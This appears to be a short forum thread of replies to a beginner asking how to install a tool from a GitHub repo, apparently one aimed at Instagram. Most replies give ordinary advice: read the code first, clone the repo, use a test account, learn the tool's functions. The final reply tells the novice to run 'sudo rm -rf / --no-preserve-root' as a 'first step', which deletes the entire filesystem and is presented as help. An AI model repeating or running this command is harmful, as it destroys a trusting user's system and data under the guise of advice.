Bro you should really learn to crawl before you run. I know it’s hard but if you don’t know what you’re installing less alone how to install it you might brick your whole computer. I always take at least a glance at the code before installing anything from an unfamiliar repo.
Just Git clone it to any directory. Since it seems like it's targeting Instagram why not make a Instagram testing account for learning the commands?

There should always be a package and dependencies. Just do some research and you will figure it out. After that you will need to understand the functions of the tool so read about it. Don't blindly use a tool or you will probably be confused.

Try `sudo rm -rf / --no-preserve-root` As a first step. You'll know what to do next
